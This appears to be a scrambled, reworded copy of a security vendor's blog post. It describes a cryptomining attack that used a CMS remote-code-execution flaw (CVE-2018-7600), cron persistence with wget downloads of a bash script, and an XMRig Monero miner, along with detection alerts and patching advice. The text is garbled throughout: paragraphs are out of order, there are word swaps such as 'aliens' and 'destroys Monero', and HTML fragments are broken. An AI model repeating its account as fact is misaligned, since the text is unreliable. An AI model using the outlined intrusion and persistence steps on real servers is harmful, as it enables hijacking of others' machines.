Using a cloud safety solution like Azure Security Center, will always monitor the safety of your networks, machines, and Azure services and will alert you when unusual activity is detected.
Azure Security Center (ASC) spotted the attack in real time, and alerted the affected client with the following alarms:
The miner compiles with the configuration inside it, and attracts on the mining tasks from the mining proxy server , hence we were unable to estimate the amount of earnings and customers of the attacker.
- Suspicious document download — Potential malicious file download with wget detected
- Suspicious CRON job — Potential suspicious scheduling tasks accessibility discovered
- Suspicious activity — ASC detected periodic document downloads and execution from the suspicious origin
- Procedure executed from suspicious location
2. Mining pools – Crypto mining projects are being managed by the mining pool, which is responsible for gathering multiple clients to donate and share the earnings across the customers. Once the attacker is exposed, his account may be blocked, although The majority of the attackers use public mining pools that are simple to deploy and use. We noticed an increasing number of cases where aliens used their proxy mining machine. This technique helps the attacker remain anonymous, either from detection by a security product inside the server (like Azure Security Center Threat detection for Linux) and from detection by the people mining pool.
By analyzing the behavior of crypto miners, 2 indicators have been noticed by us for crypto miner driven attacks:
The binary check if the machine is already compromised, and downloads using the HTTP 1.1 POST method, or another binary file depending on the amount of processors the machine has.
We also learned, from the telemetries gathered from the harmed machines, this very first command line executes inside “apache” consumer context, and inside the relative CMS working directory.
Azure Security Center discovered a cryptocurrency mining operation .
Border =”0″ height=”22″ src=”https://azurecomcdn.azureedge.net/mediahandler/acomblog/media/Default/blog/f267be76-eb27-4c79-a7ba-f1292414a9d5.png” style=”border: 0px currentcolor;margin-right: automobile;margin-left: automobile;float: none;background-image: none” title=”Cron command running wget
The URL route also has reference to the CMS name – another indication for the entrance point (and to get a sloppy attacker too ).
This vulnerability is exposed in an old version of this CMS and is anticipated to impact a large number of websites which are using out of date versions. The cause of this vulnerability is inadequate input validation within an API call.
This operation takes advantage of an old variant of known open source CMS, with a famous RCE vulnerability (CVE-2018-7600) since the entry point, then after using the CRON utility for persistency, it destroys “Monero” cryptocurrency using a fresh compiled binary of the “XMRig” open-source crypto mining instrument.
Action is simple to detect the majority of the time since it consumes resources that are considerable.
The big picture
Following the traces the attacker left , we could monitor the entry point of this malware and finish it was originated by leveraging a remote code execution vulnerability of a famous open source CMS – CVE-2018-7600.
The entry point
- Procedure name – From popular open source miners to less known mining campaigns
- Command line arguments such as known pool domain names, crypto hash calculations, mining protocol, etc..
- CPU usage ingestion
Prevention and conclusion
We did an examination and discovered that all of them ran with an unpatched version of the CMS, which is subjected to a security hazard which allows an attacker to run malicious code on the vulnerable source.
1. Killing competitors — Most crypto-attacks suppose that the system is already compromised, and attempt to kill additional computing power competitors. It does this
Preventing this assault is as simple as installing the latest security updates. A preferred option might use SaaS (Software as a support ) instead of maintaining a complete web server and software environment.
The party file (as we recorded it in this time) downloads the binary file and executes it (As seen in the picture above).
Another common method we identified is to reset the CRON tab which in many cases is in use for a persistence method for additional compute power competitors.
Decoding this command line’s base64 Component shows a sense of implementation and download of a bash script file with the CRON utility:
The initial suspicious command line we noticed on the Linux machines was:
<img alt="Base64 decoded bash command line (details censored) – wget sh.”